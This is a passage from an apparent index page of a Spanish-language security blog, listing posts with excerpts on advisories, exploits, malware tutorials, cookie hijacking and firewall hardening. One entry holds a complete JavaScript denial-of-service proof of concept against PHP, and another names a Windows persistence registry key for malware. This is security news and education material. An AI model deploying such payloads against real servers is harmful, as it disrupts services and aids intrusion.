de la red y ver qué desafíos enfrentamos. A lo largo del camino, realizaremos […] - [Fallas de seguridad críticas en el servidor HTTP Apache](https://www.republik.ec/fallas-de-seguridad-criticas-en-el-servidor-http-apache-permiten-a-los-piratas-informaticos-ejecutar-codigo-arbitrario-de-forma-remota/): Recientemente, Apache Software Foundation ha lanzado una actualización urgente (Apache HTTP Server 2.4.52) para resolver vulnerabilidades críticas en su servidor Apache HTTP. - [¿Cómo OSINT puede ayudar en la ciberseguridad?](https://www.republik.ec/como-osint-puede-ayudar-en-la-ciberseguridad/): Estamos rodeados de datos en cada momento de nuestra vigilia. Desde todas nuestras interacciones con otras personas o visitando diferentes sitios web en Internet o incluso cuando estamos haciendo... - [Detectores Garret puede ser hackeados remotamente](https://www.republik.ec/detectores-garret-puede-ser-hackeados-remotamente/): Se han descubierto una serie de fallas de seguridad en un componente de red en los detectores de metales Garrett que podrían permitir a los atacantes remotos eludir los requisitos de... - [Millones de sistemas Windows y Linux son vulnerables al pirateo remoto](https://www.republik.ec/millones-de-sistemas-windows-y-linux-son-vulnerables-al-pirateo-remoto/): Investigadores descubrieron múltiples firmware sin firmar en varios componentes del sistema, como adaptadores WiFi, concentradores USB, trackpads y cámaras utilizadas en Lenovo, Dell, HP y otros fabricantes importantes. Las fallas existentes en estos componentes permitieron a los atacantes comprometer millones de sistemas Windows y Linux, y filtrar los datos, interrumpir la operación y también implantar el malware. Una vez que los componentes del firmware están infectados, permitió a los atacantes implantar malware que permanece sin ser detectado por los controles de seguridad del software. El problema principal en la falla es que muchos de los dispositivos periféricos no verifican que […] - [¡HE VUELTO!](https://www.republik.ec/he-vuelto/): “Únicamente cuando se pierde todo somos libres para actuar”. Club de la pelea. Pues este post no se trata de alguna película o mucho menos de frases de peliculas. Este post se trata para demostrarles que ¡he vuelto!, he vuelto a lo que me gustaba. Trate de olvidar aquello que soy, por miedo al ¿qué dirán?, por miedo al fracaso por miedo a que sea catalogado como un delincuente, y si, ya fui catalogado como un delincuente por familiares, por el solo hecho de tener un conocimiento informático que no muchos poseen. He vuelto porque muchos me pidieron que regrese, porque en esto […] - [Falla crítica de seguridad en Whatsapp y Telegram recien parchada.](https://www.republik.ec/falla-critica-de-seguridad-en-whatsapp-y-telegram-recien-parchada/): A finales de enero de este año (2017) se reporto una falla crítica en whatsapp y telegram, la cual se notificó con suma urgencia ya que permitía el control total de la cuenta sin que la víctima se de cuenta de esto. Una de las revelaciones más preocupantes que surgen de la reciente publicación de WikiLeaks es la posibilidad de que las organizaciones gubernamentales puedan comprometer WhatsApp, Telegram y otras aplicaciones de chat cifradas de extremo a extremo. Aunque esto aún no se ha probado, muchos usuarios finales están preocupados porque WhatsApp y Telegram usan cifrado de extremo a extremo […] - [Google publica Chrome 50 y corrige 20 vulnerabilidades](https://www.republik.ec/google-publica-chrome-50-y-corrige-20-vulnerabilidades/): Google anuncia una nueva versión de su navegador Google Chrome 50. Se publica la versión 50.0.2661.75 para las plataformas Windows, Mac y Linux, que junto con nuevas funcionalidades y mejoras, además viene a corregir 20 nuevas vulnerabilidades.  Entre las principales novedades cabe destacar que desde esta versión el navegador deja de soportar sistemas como Windows XP, Windows Vista, Mac OS X 10.6 Snow Leopard, Mac OS X 10.7 Lion o Mac OS X 10.8 Mountain Lion. También se ha mejorado el soporte a las notificaciones push.  Como es habitual, Google solo proporciona información sobre los problemas solucionados reportados por investigadores […] - [How I Hacked Facebook, and Found Someone's Backdoor Script](https://www.republik.ec/how-i-hacked-facebook-and-found-someones-backdoor-script/): Foreword As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way much cooler to take over the server directly and gain system SHELL privileges. <( ̄︶ ̄)> Of course, both vulnerabilities from the server-side and the client-side are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, it also need some client-side vulnerabilities to do the trick. But speaking of finding vulnerabilities, I prefer to find server-side vulnerabilities first. With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in […] - [VULNERABILITY DEEP DIVE: EXPLOITING THE APPLE GRAPHICS DRIVER AND BYPASSING KASLR](https://www.republik.ec/vulnerability-deep-dive-exploiting-the-apple-graphics-driver-and-bypassing-kaslr/): Cisco Talos vulnerability researcher Piotr Bania recently discovered a vulnerability in the Apple Intel HD 3000 Graphics driver, which we blogged about here. In this post we are going to take a deeper dive into this research and look into the details of the vulnerability as well as the KASLR bypass and kernel exploitation that could lead to arbitrary local code execution. These techniques could be leveraged by malware authors to bypass software sandbox technologies, which can simply be within the software program (browser or application sandbox) or at the kernel level. In the course of conducting our research, Talos […] - [Debugging Petya bootloader with IDA](https://www.republik.ec/debugging-petya-bootloader-with-ida/): This video demonstrates a powerful technique for debugging exotic platforms, like x86 realmode. - [Solucionadas dos vulnerabilidades en Squid](https://www.republik.ec/solucionadas-dos-vulnerabilidades-en-squid/): Se han solucionado dos vulnerabilidades en SQUID versiones 3x y 4.x que podrían permitir a atacantes remotos provocar condiciones de denegación de servicio o conseguir información sensible de la memoria.  Squid es uno de los servidores proxys más populares, en gran parte por ser de código abierto y multiplataforma (aunque sus comienzos fueron para sistemas Unix).  El primero de los problemas, con CVE-2016-3947, se debe a un desbordamiento de búfer al procesar paquetes ICMPv6 por el que el binario ping es vulnerable a denegaciones de servicio o ataques que podrían permitir la obtención de información sensible. Este error también permite […] - [Linux vs BSD ¿Cúal es tu favorito?](https://www.republik.ec/linux-vs-bsd-cual-es-tu-favorito/): Seguramente te has preguntado en más de una ocasión cuáles son las similitudes y diferencias entre Linux y BSD. Más allá de ser sistemas basados en Unix hay muchas características que los distinguen. Disculpen un poco mi postura sesgada hacia BSD no miento que prefiero BSD ante sistemas Linux, no tengo nada contra Linux me gusta Linux pero prefiero BSD. Comparando Linux vs BSD De manera que, ¿cuál es la diferencia entre, digamos, Debian Linux y FreeBSD? Para el usuario avanzado la diferencia es sorprendentemente pequeña: ambos son sistemas operativos tipo UNIX. Ambos son desarrollados por proyectos no comerciales (ésto, […] - [Nuevo 0-day en Adobe Flash Player](https://www.republik.ec/nuevo-0-day-en-adobe-flash-player/): A poner las barbas en remojo Adobe ha confirmado la existencia de una vulnerabilidad en Adobe Flash Player que está explotándose en la actualidad y que podría permitir a un atacante tomar el control de los sistemas afectados.  La vulnerabilidad, considerada crítica, afecta a las versiones de Adobe Flash Player 21.0.0.197 y anteriores para Windows, Macintosh, Linux y Chrome OS. En el aviso publicado, Adobe confirma que existen informes de que se está explotando de forma activa en sistemas con Windows 10 (y anteriores) con Flash Player versión 20.0.0.306 y anteriores.  La compañía asegura la publicación de una actualización esta […] - [Vulnerabilidad remota (Root) en controladores HID](https://www.republik.ec/vulnerabilidad-remota-root-en-controladores-hid/): Si has estado alguna vez dentro de un aeropuerto, universidad, hospital, centros gubernamentales o edificio de oficinas, probablemente has visto uno de los lectores de tarjeta HID que prohíben el acceso fisico no autorizado. HID es uno de los fabricantes más grandes en el mundo de sistemas de control de acceso, los cuales se han convertido en parte de la seguridad física de muchas compañías Cada uno de esos lectores se une a un regulador que suelen estar en lugares ocultos o atrás de la puerta, controlando todas las funciones de la puerta incluyendo bloqueo y desbloqueo, horarios, alarmas, etc. […] - [Vulnerabilidades descubiertas en NEC Aterm WF800HP y Aterm WG300HP](https://www.republik.ec/vulnerabilidades-descubiertas-en-nec-aterm-wf800hp-y-aterm-wg300hp/): Se han reportado dos vulnerabilidades en NEC Aterm WF800HP y Aterm WG300HP que podrían permitir a un atacante remoto realizar ataques cross-site request forgery (CSRF).  NEC Aterm es una familia de productos para redes inalámbricas de telecomunicaciones, RDSI, comunicaciones móviles, PLC etc. Son dispositivos desarrollados tanto para entornos empresariales e industriales como para uso doméstico.  Como ya hemos comentado en reportes anteriores, CSRF es una técnica que permite realizar peticiones HTTP a usuarios no autorizados aprovechando la incorrecta (o falta de) validación de dichas peticiones. Para explotar estas vulnerabilidades, el atacante debe engañar a la víctima que ha iniciado sesión […] - [Turn your old Android device into a security camera](https://www.republik.ec/turn-your-old-android-device-into-a-security-camera/): If you’ve got an old Android smartphone or tablet in a drawer somewhere doing nothing, then why not put it to good use as a security camera. Got an old Android smartphone or tablet gathering dust somewhere? Chances are it has a pretty neat camera on it, so why not put it to good use by transforming it into a security camera? Don’t worry, this isn’t complicated at all, and doesn’t require you to root your device or know any coding. Just let an app do the work. There are quite a few apps out there that can do this […] - [Metodologías para la gestión de incidentes](https://www.republik.ec/metodologias-para-la-gestion-de-incidentes/): En este video se tratarán temas referidos a las diferentes metodologías que permiten implementar un plan de respuesta a incidentes. - [How to get Red Hat Enterprise Linux (RHEL) Operating System for FREE.](https://www.republik.ec/how-to-get-red-hat-enterprise-linux-rhel-operating-system-for-free/): If you wish to get involved with Linux development, you need to master C, download a Linux distro and get started. But, when it comes to Red Hat Enterprise Linux (RHEL) development, things are different. The OS doesn’t come free of cost — a weird thing in the open source world — and to program for RHEL, you need to spend some money. Now, Red Hat is here to make things easier for your by allowing you to get RHEL subscription for free. This has been made possible with company’s Red Hat Developer Program. It looks like Red Hat is […] - [Hacker Hijacks a Police Drone from 2 Km Away with $40 Kit](https://www.republik.ec/hacker-hijacks-a-police-drone-from-2-km-away-with-40-kit/): A researcher has demonstrated how easy it is to steal high-end drones, commonly deployed by government agencies and police forces, from 2 kilometres away with the help of less than $40 worth of hardware. The attack was developed by IBM security researcher Nils Rodday, who recently presented his findings at Black Hat Asia 2016. Hacking the $28,463 Drone with Less than $40 of Hardware Rodday explained how security vulnerabilities in a drone’s radio connection could leverage an attacker (with some basic knowledge of radio communications) to hijack the US$28,463 quadcopters with less than $40 of hardware. Rodday discovered (PPT) two […] - [SPLOITKIT - A suite of CLI tools built to automate some of the tedious parts of exploit development](https://www.republik.ec/sploitkit-a-suite-of-cli-tools-built-to-automate-some-of-the-tedious-parts-of-exploit-development/): SploitKit is a series of scripts I wrote to automate some repetitive or tedius tasks I find I commonly need to perform when writing exploits (specifically: Buffer Overflow Exploits). You’re welcome to use these too if you’d like. Script Lists: Ror Spike This script (./ror_spike.rb) is a wrapper for the SPIKE fuzzer. It creates spike templates for multiple commands (as specified in the script), and launch spike for each created file. It logs the variable that caused the crash, the command it was using, and prompts you to add a custom comment to the log. Later, you can navigate to […] - [Python Malware](https://www.republik.ec/python-malware/): This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In this video tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using PyInstaller.  Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host. Coding the Malware: One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “SoftwareMicrosoftWindowsCurrentVersionRun”.  Below is a quick screenshot […] - [Actualización del kernel para SuSE Linux Enterprise 11](https://www.republik.ec/actualizacion-del-kernel-para-suse-linux-enterprise-11/): SuSE ha publicado una actualización del kernel para SuSE Linux Enterprise Server 11 SP3 (en todas sus versiones). Se han solucionado 15 vulnerabilidades e incluye 71 correcciones de funcionalidades no relacionadas con seguridad.  Los problemas corregidos están relacionados con la función sk_nulls_node_init() en ping_unhash() de la pila ipv4, una condición de carrera en la función prepare_binprm de fs/exec.c en el kernel de Linux anterior a 3.19.6 permite a usuarios locales elevar sus privilegios, la function __driver_rfc4106_decrypt de arch/x86/crypto/aesni-intel_glue.c en kernel Linux anterior a 3.19.3 puede permitir la ejecución de código arbitrario y fallos en la function ndisc_router_discovery de net/ipv6/ndisc.c en […] - [WattUp el nuevo dispositivo que te permite cargar todos tus dispositivos de forma inalámbrica](https://www.republik.ec/wattup-el-nuevo-dispositivo-que-te-permite-cargar-todos-tus-dispositivos-de-forma-inalambrica/): Carga tus dispositivos de forma inalámbrica no es algo nuevo en lo absoluto, pero para cargar tu dispositivo estas obligado a colocar tu teléfono en la parte superior de la plataforma de carga. Bastante molestoso, a veces cuando se mueve el dispositivo el teléfono no carga. Ahora, imagine que usted nunca tenga que conectar sus smartphone, ni ponerlo sobre una molestosa plataforma para que este cargue de manera “inalámbrica”. Esto es lo que Energous Corporation tiene listo para ofrecer. WattUp – Tecnología de carga inalámbrica La empresa tecnológica Energous Corporation esta a punto de lanzar WattUp, un cargador inalámbrico que […] - [Reemplazar la bateria de tu iPhone de manera GRATUITA.](https://www.republik.ec/reemplazar-la-bateria-de-tu-iphone-de-manera-gratuita/): Nada mas aterrador que tu iPhone te avise que tiene el 5% de batería cuando hace 1 hora tenia el 100%. Para ser muy honesto, es una mierda, literalmente. Sin embargo, usted no tendrá que preocuparse por este problema ahora, ya que hay una solución. Apple acaba de modificar sus programas de garantía para que sea mas fácil para usted cambiar su batería o en algunos casos todo el equipo en una tienda Apple. Bajo su nueva política Applecare+ policy, la compañias esta ofreciendo reemplazar las baterías en los dispositivos iOS de forma gratuita hasta enero del 2016, obviamente solo […] - [Paga tus compras en linea con un #SELFIE](https://www.republik.ec/paga-tus-compras-en-linea-con-un-selfie/): ¿Tienes dificultad para recordar tus contraseñas? ¡Olvidate de tus contraseñas y huellas dactilares! y preparate para autenticar tus compras en linea con tus SELFIES. MasterCard está experimentando una nueva aplicación que permitirá realizar compras en línea, tomándote una selfie en lugar de escribir tu contraseña, poniéndose paso adelante en la evolución de los pagos móviles. Este sistema de seguridad utiliza la cámara frontal de tu teléfono móvil y la tecnología “reconocimiento facial” para obtener su pago con una rápida SELFIE. “La nueva generación que es adicta al selfie, creo que lo encontrara muy grandioso” Ajay Bhalla MasterCard President of Enterprise […] - [¿Como acceder anonimamente a una red WI-FI pública a 2.5 millas de distancia usando este increible equipo?](https://www.republik.ec/como-acceder-anonimamente-a-una-red-wi-fi-publica-a-2-5-millas-de-distancia-usando-este-increible-equipo/): El anonimato es algo que parece casi imposible en esta era del espionaje gubernamental. Incluso usando Tor y VPN ya no parece ser suficiente para proteger la privacidad del usuario. Una vez que se descubre su dirección IP ¡Game Over! Sin embargo, se ha ideado un método que no sólo permite a los usuarios conectarse de forma anónima a una red WI-FI pública, sino que también permite conectarse desde casi 2,5 millas de distancia. El investigador de seguridad Benjamín Caudill ha desarrollado un dispositivo que añade una capa adicional de anonimato para denunciantes, periodistas, disidentes y, por supuesto, los cyber-delincuentes. […] - [Diversas vulnerabilidades en IBM Security Directory Server](https://www.republik.ec/diversas-vulnerabilidades-en-ibm-security-directory-server/): IBM ha solucionado seis vulnerabilidades en IBM Security Directory Server que podrían permitir a atacantes remotos autenticados ejecutar comandos arbitrarios, a usuarios remotos obtener nformación sensible y realizar ataques de cross-site scripting y a usuarios locales obtener información.  IBM Security Directory Server, anteriormente conocido como IBM Tivoli Directory Server, es un software de gestión de identidad de IBM basado en tecnología LDAP (Lightweight Directory Access Protocol), que proporciona una infraestructura de datos de identidad de confianza para la utenticación. Soporta plataformas IBM AIX, i5, Solaris, Windows, HP-UX…  El primero de los problemas corregidos (con CVE-2015-1978) reside en una vulnerabilidad de […] - [Ejecución remota de código en IBM IBM Tivoli Endpoint Manager Mobile Device Management](https://www.republik.ec/ejecucion-remota-de-codigo-en-ibm-ibm-tivoli-endpoint-manager-mobile-device-management/): IBM ha publicado una actualización para solucionar una vulnerabilidad en IBM Endpoint Manager Mobile Device Management (MDM) que podría permitir la ejecución remota de código.  IBM Endpoint Manager Mobile Device Management forma parte de la familia de productos IBM Endpoint Manager (antiguamente conocido como Tivoli Endpoint Manager). Proporciona herramientas para la administración, protección y presentación de informes de ordenadores portátiles, de escritorio, servidores, teléfonos inteligentes, tabletas y otros dispositivos como terminales de punto de venta. Esto proporciona información y control en tiempo real sobre todos los dispositivos utilizados por los usuarios.  El problema (con CVE-2014-6140) reside en que los componentes de IBM Endpoint Manager están basados en Ruby on Rails […] - [Whatsapp DoS (crasheando whatsapp)](https://www.republik.ec/whatsapp-dos-crasheando-whatsapp/): Actualmente no sorprende que la seguridad de whatsapp sea comprometida o tenga bugs que permitan una denegación de servicio, ya que en cada versión whatsapp aparte de “unirnos entre mensajes” nos da ciertos dolores de cabeza cuando a privacidad se trata, en esta ocasión un atacante remoto o tan solo un amigo con ganas de molestar puede congelar tu aplicación de whatsapp con un simple mensaje, en versiones anteriores hubo el mismo error que fue “corregido” rápidamente. Aquí muestro la “prueba de concepto” en la que copiando y pegando luego enviando este mensaje podremos percatarnos como el chat se le congela a persona que se lo enviaste. La […] - [Evitando SQL INJECTION CON .htaccess](https://www.republik.ec/evitando-sql-injection-con-htaccess/): El día domingo 6 de octubre un día común y corriente recibí la noticia que uno de los sitios web de un amigo había sido vulnerado, el sitio primeramente creado en Joomla 1.6 (no actualizado) fue vulnerado bajo la falla que permite registrarte como administrador pudiendo subir facilmente archivos php, htaccess entre otros (por suerte el lammer que vulnero la seguridad era muy inexperto). Revisando los logs del sistema pude darme cuenta de los archivos que habían sido modificados entre ellos el index, subió algunas “php shells” en diferentes carpetas para tener acceso cuando le diera la gana (una vez […] - [Secuestrando cuentas OUTLOOK y HOTMAIL](https://www.republik.ec/secuestrando-cuentas-outlook-y-hotmail/): Recuerdo la época del 2000 – 2006 donde podíamos tener el control absoluto de una cuenta de hotmail con tan solo su cookie, pues bien hoy en la actualidad no ha cambiado mucho el panorama, tan solo con la cookie de una sesión podemos tener control absoluto de una cuenta outlook o hotmail, pero como podemos demostrarlo? como logramos hacerlo? pues bien este blog NO TE VA A ENSEÑAR a robar una cuenta, como pienses y hagas con lo que aprendes es cuestión tuya, pero aquí demostrare la falla de seguridad que maneja microsoft. Para esta demostración usaremos: Firefox Cookie exporter Cookie importer Pues bien que hacemos con esto? ya con firefox y los […] - [Python y Ruby... Programacion para tus hijos](https://www.republik.ec/python-y-ruby-programacion-para-tus-hijos/): Es cierto que python y ruby son uno de los mejores lenguajes de programación, su estabilidad y rapidez a la hora de crear un programa son asombrosas, pero como podemos llevar estos lenguajes a los niños? Navegando por Internet encontré unas aplicaciones muy buenas que enseñaran a tus hijos aprender a programar de manera divertida en python y ruby, bueno no solo es para niños también lo pueden usar jóvenes y adultos que no tengan conocimientos de estos lenguajes. Doma de Serpientes para Niños Aprendiendo a Programar con Python “Snake Wrangling for Kids” es un libro electrónico para niños de 8 o más años que quieran aprender a […] - [chicos malos? entre mas los entendamos MEJOR!!!](https://www.republik.ec/chicos-malos-entre-mas-los-entendamos-mejor/): Recientemente tuve la oportunidad de ser invitado a ciertos webcast de seguridad y hablar en una variedad de eventos informáticos, había tanto grandes como pequeños en materia de programas maliciosos modernos y ataques basados ​​en red. El tema era bastante denso y el público estaba formado principalmente por investigadores, autoridades gubernamentales y especialistas en seguridad de la red. Sin embargo, una cosa que noté fue que en todos estos eventos habia un número significativo de chicos de escuela secundaria y estudiantes universitarios. Esto me pareció una estrategia muy inteligente, incluso si algunos de los detalles fue más allá de su […] - [Whatsapp y sus constantes fallas](https://www.republik.ec/whatsapp-y-sus-constantes-fallas/): El día de ayer en iTunes apareció la nueva actualización de whatapp v 2.8.1 la cual cuenta con algunas novedades entre esas incorporar foto a tu profile, aumento de las personas que pueden estar en un grupo a 20 personas (antes 10) y la posibilidad de modificar la foto de perfil de algún contacto. Sin embargo el día de hoy nos encontramos con la noticia que se les pedía al usuario con dispositivo ios no actualizar la nueva actualización cuenta con un Bug que genera un error al actualizar whatsapp en iPhone que obliga a eliminar y volver a instalar la app […] - [Vulnerabilidad CPU INTEL](https://www.republik.ec/vulnerabilidad-cpu-intel/): El fallo ya ha sido explotado en versiones de 64 bits de Microsoft Windows 7, FreeBSD, NetBSD y existe la posibilidad del OS X de Apple también puedan ser vulnerables. El fallo de esta vulnerabilidad se dio a conocer en un aviso de seguridad publicado esta semana. Los atacantes podrían ejecutar código malicioso a través de los privilegios del kernel o lanzar un ataque de elevación de privilegios local.  VMware no se ve afectado, como tampoco lo son los procesadores AMD, ya que no utiliza la instrucción SYSRET. Algunos de los proveedores afectados han llevado ya a cabo una actualización que desactiva la […] - [Denegación de servicio en Cisco IOS XR](https://www.republik.ec/denegacion-de-servicio-en-cisco-ios-xr/): La vulnerabilidad es en Cisco IOS XR anteriores a v4.2.1 en dispositivos ASR series 900 y dispositivos CRS, permite a atacantes remotos provocar una denegación de servicio (transmisión de paquetes cortados) a través de un paquete manipulado, también conocido como Bug IDs CSCty94537 y CSCtz62593. Referencias: Cisco: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120530-iosxr - [XSS (cross-site scripting)](https://www.republik.ec/xss-cross-site-scripting/): Segun la wikipedia nos dice lo siguiente: XSS, del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad típico de las aplicaciones Web, que permite a una tercera parte inyectar códigoJavaScript en páginas web vistas por el usuario, evitando medidas de control como la Política del mismo origen.Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web. No se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en […] - [Denegacion de Servicio en Router MIKROTIK](https://www.republik.ec/denegacion-de-servicio-en-router-mikrotik/): La denegación de servicio, sucede en el servicio de mikrotik router winbox cuando el atacante está continuamente solicitando una parte de un archivo plugin/dll, por lo que el servicio se vuelve inestable causando a todos los clientes remotos (con winbox) desconexion y negando volver aceptar más conexiones. Esto ocurre durante unos 5 minutos. Después de los 5 minutos, winbox es estable otra vez, sera capaz de aceptar nuevas conexiones. Si enviamos el mismo paquete malicioso en un bucle (que solicita parte de un archivo inmediatamente después de convertirse en el servicio vuelva a estar disponible), entonces tendremos una denegación 100% del servicio winbox., aumentando al 100% el cpu […] - [Vulnerabilidad en el servicio Samba afecta BlackBerry PlayBook](https://www.republik.ec/vulnerabilidad-en-el-servicio-samba-afecta-blackberry-playbook/): Existe una vulnerabilidad de ejecución remota de código en el servicio Samba que se entrega con el servicio de BlackBerry PlayBook para compartir archivos. El servicio de Samba es parte de un pack de software de código abierto utilizado para compartir archivos entre la tableta y un ordenador central. Un atacante remoto podría aprovechar la vulnerabilidad para lanzar un exploit en una red Wi-Fi o usar el acceso físico a una tableta con conexión USB para obtener acceso root en la tableta. Los usuarios de la playbook que se conectan de la tableta al ordenador mediante USB, o los usuarios […] - [Bloquear escaneos de nmap con iptables y packet filter](https://www.republik.ec/bloquear-escaneos-de-nmap-con-iptables-y-packet-filter/): Requerimientos iptables packet filter #!/bin/bash #===================== # Habilitamos ip forward #--------------------- echo 1 > /proc/sys/net/ipv4/ip_forward #===================== # hacemos un flush #--------------------- /sbin/iptables -F /sbin/iptables -t nat -F #===================== # empezamos el bloqueo #--------------------- /sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT /sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT /sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT /sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP /sbin/iptables -t filter -A INPUT -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "FIN: " /sbin/iptables -t […] - [Que es el pharming?](https://www.republik.ec/que-es-el-pharming/): Bueno como saben y sabemos algunos, el ataque pharming no es un ataque o explotacion nueva, al contrario ya tiene pocos años atras que vino a reemplazar al casi obsoleto pishing, pero veamos que es el pharming segun wikipedia. Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página […] - [Fallo en BIND permite que los dominios no se borren nunca de las cachés](https://www.republik.ec/fallo-en-bind-permite-que-los-dominios-no-se-borren-nunca-de-las-caches/): Se ha publicado un fallo en el sistema de actualización de caché en servidores BIND 9.x. Un atacante podría tener acceso a los datos de un dominio cuyos datos han sido borrados. BIND es un servidor DNS que fue desarrollado a principios de los 80 por cuatro universitarios de la Universidad de Berkely (California). Más adelante, el desarrollo quedó a cargo de varios empleados de DEC para que finalmente, Paul Vixie, terminase fundando ISC que es la organización que se ha encargado del mantenimiento de este software desde entonces. La última versión del software original apareció en mayo de 1997 como BIND 8. A partir de […] - [El 'malware' en Android ha aumentado un 472%](https://www.republik.ec/el-malware-en-android-ha-aumentado-un-472/): La cantidad de aplicaciones con contenido malicioso en Android ha crecido un 472 por ciento de julio a septiembre de 2011, lo que supone un aumento del 400 por ciento desde 2009 hasta el verano de 2010. Además, el número de dispositivos Android infectados con ‘malware’ en el mes de octubre de 2011 aumentó un 110 por ciento respecto al mes anterior y un 171 por ciento respecto a 2010. Los dispositivos con Android crecen cada vez más rápido en el mercado de los dispositivos móviles, ganando mayor cuota de mercado cada mes. Sin embargo, Android no solo es el […] - ["Kernel panic" en IBM AIX con solo enviar paquetes TCP](https://www.republik.ec/kernel-panic-en-ibm-aix-con-solo-enviar-paquetes-tcp/): IBM ha publicado una actualización para solucionar una vulnerabilidad en la implementación TCP de su sistema operativo AIX en las versiones 5, 6 y 7 El fallo permitiría a un atacante provocar un “kernel panic” con solo enviar un paquete a la interfaz de red. Una especie de “ping de la muerte” con protocolo TCP.  AIX (Advanced Interactive eXecutive) es un sistema operativo UNIX propiedad de IBM que corre en las pSeries de los IBM eServers, utilizando procesadores de la familia IBM POWER de 32 y 64 bits. La primera versión (AIX V1) apareció en 1986. Estaba basada en un System V Release 3 de UNIX y se […] - [Vulnerabilidad en OfficeSIP, Denegacion de Servicio](https://www.republik.ec/vulnerabilidad-en-officesip-denegacion-de-servicio/): La vulnerabilidad se debe a una validación incorrecta de SIP/SIPS en el “To” del encabezado de la solicitud, que permite a atacantes remotos causar una denegación de servicio Impacto: Una explotación exitosa podría permitir a un atacante hacer caer el servicio. Software afectado: OfficeSIP Server 3.1 Probado en: OfficeSIP Server 3.1 sobre Windows XP SP2 & SP3 Windows 7. Versiones anteriores pueden ser afectadas - [Vulnerabilidad critica en php (REMOTA)](https://www.republik.ec/vulnerabilidad-critica-en-php-remota/): // Prueba de concepto function createEvilObj () {    var evil_obj = {};    for (var i = 0; i < 1001; i++) {        evil_obj[i] = 1;    }    evil_obj['kill[]'] = 'kill';    return evil_obj;} // Serialize Javascript object into POST datafunction serializeObj (obj) {    var str = [];    for(var p in obj) {        str.push(p + "=" + obj[p]);    }    return str.join("&");} // Run attackfunction attackSite () {    var bad = serializeObj(createEvilObj());    var xhr = new XMLHttpRequest();    xhr.open("POST", location.href, true);    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');    xhr.setRequestHeader('Content-Length', bad.length);    xhr.send(bad);} attackSite(); - [Elevación de privilegios en el kernel Linux y un exploit interesante](https://www.republik.ec/elevacion-de-privilegios-en-el-kernel-linux-y-un-exploit-interesante/): El pasado día 17 de enero, Linus Torvalds hizo un commit para corregir una elevación de privilegios en el kernel Linux 2.6 (CVE-2012-0056). El fallo fue descubierto por Jüri Aedla y según comenta Torvalds en el propio parche, se debe a una incorrecta comprobación de privilegios al abrir el /proc/#pid#/mem de un proceso.  Este error no pasó desapercibido a Jason A. Donenfeld que ha escrito y publicado un interesante exploit. Lo ha bautizado como ‘Mempodipper’.  Donenfeld estudió en detalle el proceso de explotación. De partida se encontró con que efectivamente la comprobación de permisos era débil y además, que la protección contra escritura en el espacio de […] - [Múltiples vulnerabilidades en Winamp](https://www.republik.ec/multiples-vulnerabilidades-en-winamp/): Se han descubierto varias vulnerabilidades en Winamp que pueden permitir la ejecución de código arbitrario. Winamp es uno de los reproductores de audio y vídeo más populares para la plataforma Windows, aunque también está disponible para otras como Mac y Android. Winamp soporta una gran cantidad de formatos multimedia, entre los que se encuentran MID, MIDI, MP1, MP2, MP3, MP4, AAC, Ogg Vorbis, WAV, WMA, CDA, KAR (Karaoke), AVI, MPEG y NSV. Se han publicado varias vulnerabilidades que afectan a diferentes plugins de Winamp en su versión 5.621 y anteriores. Dichas vulnerabilidades son las siguientes: * Un error en “in_midi” al manejar el valor “iOffsetMusic” en la cabecera […] - [Cisco publica cinco boletines de seguridad](https://www.republik.ec/cisco-publica-cinco-boletines-de-seguridad/): Cisco ha publicado cinco boletines de seguridad que solventan diversas vulnerabilidades, entre las que se encuentran dos escaladas de directorios, dos ejecuciones de código y una denegación de servicio. Los productos afectados son los siguientes: * Cisco Unified Contact Center Express: Permitiría a un usuario remoto no autenticado obtener ficheros a través de una URL especialmente manipulada mediante una escalada de directorios. (CVE-2011-3315) * Cisco Security Agent: El fallo, que permitiría una ejecución de código arbitrario, es debido a dos vulnerabilidades de software externo a Cisco, presentes en la librería ‘Oracle Outside In’ utilizada por Cisco Security Agent. (CVE-2011-0794 y CVE-2011-0808) * Cisco Video Surveillance IP Cameras: […] - [Un gusano se aprovecha de Servidores JBoss Application Server vulnerables o mal configurados](https://www.republik.ec/un-gusano-se-aprovecha-de-servidores-jboss-application-server-vulnerables-o-mal-configurados/): Un gusano aprovecha para infectar servidores que ejecutan JBoss Application Server (JBoss AS) con una incorrecta configuración de seguridad o en los que no se han aplicado los parches de seguridad publicados.  JBoss Application Server es un servidor de aplicaciones J2EE que actualmente va por su versión 7. Se distribuye bajo licencia GPL por lo que es muy utilizado tanto por parte de los desarrolladores como por las empresas.  Se ha detectado un gusano que afecta a los servidores que ejecutan JBoss AS y aplicaciones basadas en él. Se aprovecha de consolas JMX incorrectamente aseguradas o sin ninguna protección para ejecutar código arbitrario. Se propaga inyectándose en la consola […] - [Revelación de información sensible en Joomla](https://www.republik.ec/revelacion-de-informacion-sensible-en-joomla/): Se han publicado dos fallos de seguridad en Joomla! que podrían permitir a un atacante tener acceso a información sensible.  Joomla! es un sistema de gestión de contenidos y framework web muy popular para la realización de portales web. Cuenta con una la gran cantidad de extensiones de fácil integración que le proporcionan un gran potencial.  El primero de los fallos de seguridad fue reportado por Aung Khant, perteneciente al 